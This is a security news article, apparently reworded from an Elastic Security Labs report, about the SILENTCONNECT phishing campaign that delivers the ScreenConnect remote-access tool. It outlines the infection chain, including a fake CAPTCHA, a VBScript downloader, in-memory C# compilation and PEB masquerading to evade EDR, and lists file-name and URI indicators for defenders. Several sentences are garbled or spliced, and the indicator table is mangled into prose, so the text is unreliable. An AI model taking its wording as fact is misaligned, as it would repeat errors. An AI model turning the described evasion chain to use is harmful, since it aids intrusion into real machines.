Fake invitations fuel the SILENTCONNECT campaign that sends out the ScreenConnect RAT.

Elastic Security Labs has found a new bad campaign that uses an undocumented loader called SILENTCONNECT to send out the ScreenConnect Remote Monitoring and Management (RMM) tool This article explores run payload infection. . This secret operation has mostly gone unnoticed since March 2025 because it uses trusted platforms and living-off-the-land binaries to run its payload.

Infection Chain and Ways to Avoid It When someone gets a phishing email that looks like a project proposal or digital invitation, the SILENTCONNECT infection chain starts. The link takes the victim to a fake Cloudflare Turnstile CAPTCHA page that is hosted on hacked infrastructure. When the user checks the verification box, a VBScript file that is only slightly obfuscated is downloaded to the target machine.

This script is the first downloader. It uses a fake children's story and string manipulation to hide what it really wants to do. When the VBScript runs, it starts a PowerShell process that uses the curl utility to get an obfuscated C# payload from Google Drive.

The Add-Type cmdlet in PowerShell compiles the C# source code at runtime, but this payload is only saved for a short time. After being compiled, the .NET assembly is loaded directly into memory and run reflectively, which completely avoids the traditional execution footprints that are stored on disk. Once the main SILENTCONNECT loader is running, it uses advanced methods to avoid detection by security software. The malware uses the built-in NtAllocateVirtualMemory API to set aside memory that can be run.

SILENTCONNECT attack diagram (Source: elastic) It adds a small shellcode stub to find the Process Environment Block (PEB) on the fly.

SILENTCONNECT goes around higher-level Windows APIs that are watched by going straight to the PEB. Then, the loader changes its own module entries in the PEB by replacing its name and path with those of the harmless Windows program winhlp32.exe. This PEB masquerading method works well to hide the PEB from endpoint detection and response (EDR) agents that depend on it as a reliable source of data.

Cloudflare CAPTCHA page (Source: elastic) Operational Infrastructure and Identifiers The people behind SILENTCONNECT use legitimate hosting services like Cloudflare and Google Drive a lot, which makes it hard for network defenders to completely block the bad traffic. But the attackers showed bad operational security by using the URI path download_invitee.php over and over again on different hacked websites.

This consistent naming convention helped researchers find more infrastructure, such as fake DocuSign and Microsoft Teams portals that sent RMM agents directly. PowerShell download of cURL (Source: elastic) The misuse of legitimate RMM software like ScreenConnect Elastic is becoming more common because these tools are trusted in business settings and work well with normal administrative traffic. File Name E-INVITE.vbs for Artifact Type Indicator / Detail Description The first VBScript payload was downloaded through Cloudflare CAPTCHA.

File Name Suggestion: 03-2026.vbs Alternate VBScript lure seen in recent phishing emails. PowerShell got the C# source code for File Name FileR.txt from Google Drive and compiled it. URI Path: /download_invitee.php Used the same path on hacked sites to deliver the payload.

Security teams should keep an eye out for unexpected Defender exclusions, keep track of unexpected memory allocation calls from .NET processes, and check their networks for unauthorized RMM use. The table below lists the main signs and file artifacts that are linked to this campaign.